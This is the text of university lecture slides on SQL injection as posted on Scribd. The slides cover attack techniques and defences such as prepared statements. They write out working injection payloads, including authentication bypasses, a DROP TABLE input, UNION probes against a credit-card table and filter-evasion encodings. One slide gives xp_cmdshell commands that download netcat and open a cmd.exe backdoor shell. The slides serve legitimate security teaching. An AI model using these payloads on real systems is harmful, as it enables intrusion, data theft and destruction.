Scribd
Upload
106 views37 pages

SQL Injection

This document discusses SQL injection attacks and methods for preventing them. It covers topics like how SQL injection works, exploiting SQL injection bugs, and mitigating the risk through effective techniques like prepared statements and whitelist input validation. The key message is that dynamically constructing SQL statements by concatenating user input leaves applications vulnerable to injection, and that using prepared statements with bound parameters provides strong protection.

Uploaded by

Ramón Zegers Arancibia
Copyright
© © All Rights Reserved
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
Download as ppt, pdf, or txt
106 views37 pages

SQL Injection

This document discusses SQL injection attacks and methods for preventing them. It covers topics like how SQL injection works, exploiting SQL injection bugs, and mitigating the risk through effective techniques like prepared statements and whitelist input validation. The key message is that dynamically constructing SQL statements by concatenating user input leaves applications vulnerable to injection, and that using prepared statements with bound parameters provides strong protection.

Uploaded by

Ramón Zegers Arancibia
Copyright
© © All Rights Reserved
Available Formats
Download as PPT, PDF, TXT or read online on Scribd
Download as ppt, pdf, or txt
Download as ppt, pdf, or txt
You are on page 1/ 37

SQL

INJECTION
CPSC 4670
Topics
1. What are injection attacks?
2. How SQL Injection Works
3. Exploiting SQL Injection Bugs
4. Mitigating SQL Injection
5. Other Injection Attacks
Injection
Injection attacks trick an application into including
unintended commands in the data send to an
interpreter.
Interpreters
Interpret strings as commands.
Ex: SQL, shell (cmd.exe, bash), LDAP, XPath
Key Idea
Input data from the application is executed as
code by the interpreter.
SQL Injection
1. App sends form to user.
2. Attacker submits form with
SQL exploit data.
3. Application builds string with
exploit data.
4. Application sends SQL query
to DB.
5. DB executes query, including
exploit, sends data back to
application.
6. Application returns data to
user.
Web Server
Attacker
DB Server
Firewall
User
Pass
or 1=1--
Form
SQL Injection in PHP
$link = mysql_connect($DB_HOST, $DB_USERNAME,
$DB_PASSWORD) or die ("Couldn't connect: " . mysql_error());
mysql_select_db($DB_DATABASE);
$query = "select count(*) from users where username = '$username'
and password = '$password ";
$result = mysql_query($query);
SQL Injection Attack #1
Unauthorized Access Attempt:
password = or 1=1 --
SQL statement becomes:
select count(*) from users where username =
user and password = or 1=1 --
Checks if password is empty OR 1=1, which is
always true, permitting access.

SQL Injection Attack #2
Database Modification Attack:
password = foo; delete from table users
where username like %
DB executes two SQL statements:
select count(*) from users where username = user and
password = foo
delete from table users where username like %
Exploits of a Mom
Finding SQL Injection Bugs
1. Submit a single quote as input.
If an error results, app is vulnerable.
If no error, check for any output changes.
2. Submit two single quotes.
Databases use to represent literal
If error disappears, app is vulnerable.
3. Try string or numeric operators.
Oracle: ||FOO
MS-SQL: +FOO
MySQL: FOO
2-2
81+19
49-ASCII(1)
Injecting into SELECT
Most common SQL entry point.
SELECT columns
FROM table
WHERE expression
ORDER BY expression
Places where user input is inserted:
WHERE expression
ORDER BY expression
Table or column names
Injecting into INSERT
Creates a new data row in a table.
INSERT INTO table (col1, col2, ...)
VALUES (val1, val2, ...)
Requirements
Number of values must match # columns.
Types of values must match column types.
Technique: add values until no error.
foo)--
foo, 1)--
foo, 1, 1)--
Injecting into UPDATE
Modifies one or more rows of data.
UPDATE table
SET col1=val1, col2=val2, ...
WHERE expression
Places where input is inserted
SET clause
WHERE clause
Be careful with WHERE clause
OR 1=1 will change all rows
UNION
Combines SELECTs into one result.
SELECT cols FROM table WHERE expr
UNION
SELECT cols2 FROM table2 WHERE expr2
Allows attacker to read any table
foo UNION SELECT number FROM cc--
Requirements
Results must have same number and type of cols.
Attacker needs to know name of other table.
DB returns results with column names of 1
st
query.
UNION
Finding #columns with NULL
UNION SELECT NULL--
UNION SELECT NULL, NULL--
UNION SELECT NULL, NULL, NULL--
Finding #columns with ORDER BY
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
Finding a string column to extract data
UNION SELECT a, NULL, NULL
UNION SELECT NULL, a, NULL--
UNION SELECT NULL, NULL, a--
Inference Attacks
Problem: What if app doesnt print data?
Injection can produce detectable behavior
Successful or failed web page.
Noticeable time delay or absence of delay.
Identify an exploitable URL
http://site/blog?message=5 AND 1=1
http://site/blog?message=5 AND 1=2
Use condition to identify one piece of data
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 1
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) = 2
... or use binary search technique ...
(SUBSTRING(SELECT TOP 1 number FROM cc), 1, 1) > 5
More Examples (1)
Application authentication bypass using SQL
injection.
Suppose a web form takes userID and
password as input.
The application receives a user ID and a
password and authenticate the user by checking
the existence of the user in the USER table and
matching the data in the PWD column.
Assume that the application is not validating
what the user types into these two fields and the
SQL statement is created by string
concatenation.
More Example (2)
The following code could be an example of such
bad practice:
sqlString = select USERID from USER where USERID =
` & userId & ` and PWD = ` & pwd & `
result = GetQueryResult(sqlString)
If(result = ) then
userHasBeenAuthenticated = False
Else
userHasBeenAuthenticated = True
End If
More Example (3)
User ID: ` OR ``=`
Password: `OR ``=`
In this case the sqlString used to create the
result set would be as follows:
select USERID from USER where USERID = ``OR``=``and PWD = ``
OR``=``
select USERID from USER where USERID = ``OR``=``and PWD = ``
OR``=``
TRUE TRUE
Which would certainly set the
userHasBenAuthenticated variable to true.
More Example (4)
User ID: ` OR ``=`` --
Password: abc

Because anything after the -- will be ignore, the
injection will work even without any specific
injection into the password predicate.
More Example (5)
User ID: ` ; DROP TABLE USER ; --
Password: `OR ``=`

select USERID from USER where USERID = `` ; DROP
TABLE USER ; -- ` and PWD = ``OR ``=``

I will not try to get any information, I just wan to bring the
application down.
Beyond Data Retrieval
Microsoft's SQL Server supports a stored procedure
xp_cmdshell that permits what amounts to arbitrary
command execution, and if this is permitted to the
web user, complete compromise of the webserver is
inevitable.
What we had done so far was limited to the web
application and the underlying database, but if we can
run commands, the webserver itself cannot help but
be compromised. Access to xp_cmdshell is usually
limited to administrative accounts, but it's possible to
grant it to lesser users.
With the UTL_TCP package and its procedures and
functions, PL/SQL applications can communicate with
external TCP/IP-based servers using TCP/IP.
Because many Internet application protocols are
based on TCP/IP, this package is useful to PL/SQL
applications that use Internet protocols and e-mail.
Beyond Data Retrieval
Downloading Files
exec master..xp_cmdshell tftp
192.168.1.1 GET nc.exe c:\nc.exe
Backdoor with Netcat
exec master..xp_cmdshell nc.exe -e
cmd.exe -l -p 53
Direct Backdoor w/o External Cmds
UTL_TCP.OPEN_CONNECTION('192.168.0.1',
2222, 1521)
//charset: 1521
//port: 2222
//host: 192.168.0.1

Impact of SQL Injection
1. Leakage of sensitive
information.
2. Reputation decline.
3. Modification of sensitive
information.
4. Loss of control of db server.
5. Data loss.
6. Denial of service.
The Cause: String Building
Building a SQL command string with user input
in any language is dangerous.

Variable interpolation.
String concatenation with variables.
String format functions like sprintf().
String templating with variable replacement.
Mitigating SQL Injection
Ineffective Mitigations
Blacklists
Stored Procedures

Partially Effective Mitigations
Whitelists
Prepared Queries
Blacklists
Filter out or Sanitize known bad SQL meta-
characters, such as single quotes.
Problems:
1. Numeric parameters dont use quotes.
2. URL escaped metacharacters.
3. Unicode encoded metacharacters.
4. Did you miss any metacharacters?
Though it's easy to point out some dangerous
characters, it's harder to point to all of them.
Bypassing Filters
Different case
SeLecT instead of SELECT or select
Bypass keyword removal filters
SELSELECTECT
URL-encoding
%53%45%4C%45%43%54
SQL comments
SELECT/*foo*/num/*foo*/FROM/**/cc
SEL/*foo*/ECT
String Building
us||er
chr(117)||chr(115)||chr(101)||chr(114)
Stored Procedures
Stored Procedures build strings too:

CREATE PROCEDURE dbo.doQuery(@id nchar(128))
AS
DECLARE @query nchar(256)
SELECT @query = SELECT cc FROM cust WHERE
id= + @id +
EXEC @query
RETURN
it's always possible to write a stored procedure that
itself constructs a query dynamically: this provides no
protection against SQL Injection. It's only proper
binding with prepare/execute or direct SQL statements
with bound variables that provide protection.
Whitelist
Reject input that doesnt match your list of
safe characters to accept.

Identify what is good, not what is bad.
Reject input instead of attempting to repair.
Still have to deal with single quotes when
required, such as in names.
Prepared Queries
bound parameters, which are supported by
essentially all database programming interfaces.
In this technique, an SQL statement string is
created with placeholders - a question mark for
each parameter - and it's compiled ("prepared", in
SQL parlance) into an internal form. Later, this
prepared query is "executed" with a list of
parameters.
Example in Perl:
$sth = $dbh->prepare("SELECT email, userid FROM members WHERE email = ?;");
$sth->execute($email);
$email is the data obtained from the user's form, and it is passed as positional
parameter #1 (the first question mark), and at no point do the contents of this
variable have anything to do with SQL statement parsing. Quotes, semicolons,
backslashes, SQL comment notation - none of this has any impact, because it's
"just data". There simply is nothing to subvert, so the application is be largely
immune to SQL injection attacks.
Prepared Queries
bound parameters in Java
Insecure version
Statement s = connection.createStatement(); ResultSet rs =
s.executeQuery("SELECT email FROM member WHERE name = " + formField);
// *boom*
Secure version
PreparedStatement ps = connection.prepareStatement( "SELECT email FROM
member WHERE name = ?");
ps.setString(1, formField);
ResultSet rs = ps.executeQuery();
There also may be some performance benefits if this prepared query is
reused multiple times (it only has to be parsed once), but this is minor
compared to the enormous security benefits. This is probably the single
most important step one can take to secure a web application.
References:
http://devzone.zend.com/article/686
http://unixwiz.net/techtips/sql-injection.html
<?php
$mysqli = new mysqli('localhost', 'user', 'password', 'world');

/* check connection */
if (mysqli_connect_errno()) {
printf("Connect failed: %s\n", mysqli_connect_error());
exit();
}

$stmt = $mysqli->prepare("INSERT INTO CountryLanguage VALUES (?, ?, ?, ?)");
$stmt->bind_param('sssd', $code, $language, $official, $percent); // sssd specifies format

$code = 'DEU';
$language = 'Bavarian';
$official = "F";
$percent = 11.2;

/* execute prepared statement */
$stmt->execute();

printf("%d Row inserted.\n", $stmt->affected_rows);

/* close statement and connection */
$stmt->close();

/* Clean up table CountryLanguage */
$mysqli->query("DELETE FROM CountryLanguage WHERE Language='Bavarian'");
printf("%d Row deleted.\n", $mysqli->affected_rows);

/* close connection */
$mysqli->close();
?>

Prepared
Queries
Other Injection Types
Shell injection.
Scripting language injection.
File inclusion.
XML injection.
XPath injection.
LDAP injection.
SMTP injection.
SQL injection Conclusion
SQL injection is technique for exploiting
applications that use relational databases as
their back end.
Applications compose SQL statements and
send to database.
SQL injection use the fact that many of these
applications concatenate the fixed part of SQL
statement with user-supplied data that forms
WHERE predicates or additional sub-queries.
SQL injection Conclusion
The technique is based on malformed user-
supplied data
Transform the innocent SQL calls to a
malicious call
Cause unauthorized access, deletion of data,
or theft of information
All databases can be a target of SQL injection
and all are vulnerable to this technique.
The vulnerability is in the application layer
outside of the database, and the moment that
the application has a connection into the
database.
Project 7: Due on April 25
Visit the website for information about webGoat:
http://www.irongeek.com/i.php?page=videos/webgoat-sql-injection
Read WebGoad User and Install Guide
http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project
Install WebGoat and play with SQL injection.
References
1. Andres Andreu, Professional Pen Testing for Web Applications, Wrox, 2006.
2. Chris Anley, Advanced SQL Injection In SQL Server Applications,
http://www.nextgenss.com/papers/advanced_sql_injection.pdf, 2002.
3. Stephen J. Friedl, SQL Injection Attacks by Example, http://www.unixwiz.net/techtips/sql-
injection.html, 2005.
4. Ferruh Mavituna, SQL Injection Cheat Sheet, http://ferruh.mavituna.com/sql-injection-
cheatsheet-oku
5. J.D. Meier, et. al., Improving Web Application Security: Threats and Countermeasures,
Microsoft, http://msdn2.microsoft.com/en-us/library/aa302418.aspx, 2006.
6. Randall Munroe, XKCD, http://xkcd.com/327/
7. OWASP, OWASP Testing Guide v2,
http://www.owasp.org/index.php/Testing_for_SQL_Injection, 2007.
8. Joel Scambray, Mike Shema, and Caleb Sima, Hacking Exposed: Web Applications, 2nd
edition, Addison-Wesley, 2006.
9. SEMS, SQL Injection used to hack Real Estate Web Sites,
http://www.semspot.com/2007/12/19/sql-injection-used-to-hack-real-estate-websites-
extreme-blackhat/, 2007.
10. Chris Shiflett, Essential PHP Security, OReilly, 2005.
11. SK, SQL Injection Walkthrough,
http://www.securiteam.com/securityreviews/5DP0N1P76E.html, 2002.
12. SPI Labs, Blind SQL Injection,
http://sqlinjection.com/assets/documents/Blind_SQLInjection.pdf, 2007.
13. Dafydd Stuttard and Marcus Pinto, Web Application Hackers Handbook, Wiley, 2007.
14. WASC, Web Application Incidents Annual Report 2007,
https://bsn.breach.com/downloads/whid/The%20Web%20Hacking%20Incidents%20Datab
ase%20Annual%20Report%202007.pdf, 2008.

You might also like